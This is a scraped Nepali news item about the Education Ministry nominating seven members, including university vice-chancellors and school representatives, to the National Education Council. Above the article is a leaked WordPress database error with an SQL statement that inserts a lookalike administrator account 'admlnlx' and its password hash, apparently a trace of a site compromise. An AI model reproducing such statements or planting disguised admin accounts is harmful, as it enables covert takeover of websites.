WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjfZcgSfoFp0t3wpdk8hrchJHFj3qf/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 21:56:59', '', 'admlnlx', 'admlnlx')
चितवन, फागुन ५–
शिक्षा मन्त्रालयले राष्ट्रिय शिक्षा परिषदमा सात जना सदस्यहरुलाई मनोनित गरेको छ ।परिषदमा कृषि वन विश्वविद्यालय चितवनका उपकुलपति आइपी ढकाल, सुदूरपश्चिम विश्वविद्यालयका उपकुलपति भुषण श्रेष्ठ र पोखरा विश्वविद्यालयका उपकुलपति चिरञ्जीवि शर्मा मनोनित गरिएको हो ।त्यसैगरी परिषदमा सामुदायिक विद्यालय सञ्चालक समितिको अध्यक्षबाट टेकबहादुर थापा र निर्मला सुवेदी मनोनित भएका छन् ।
निजी विद्यालयको तर्फबाट एन प्याव्सनका उपाध्यक्ष डा. कुस्मिला आचार्य र प्याव्सनका उपाध्यक्ष विजय सम्वाहम्फे मनोनित भएका छन् ।यससँगै परिषदले पूर्णता पाएको छ । संशोधित शिक्षा ऐनमा शिक्षा मन्त्रीको अध्यक्षतामा २३ सदस्यीय राष्ट्रिय शिक्षा परिषद गठन गर्ने व्यवस्था छ । परिषदका सदस्यहरुको कार्यकाल तीन वर्ष हुन्छ ।परिषदले शिक्षा सम्बन्धी नीति निर्धारण गर्न सरकारलाई सल्लाह सुझाव दिन्छ ।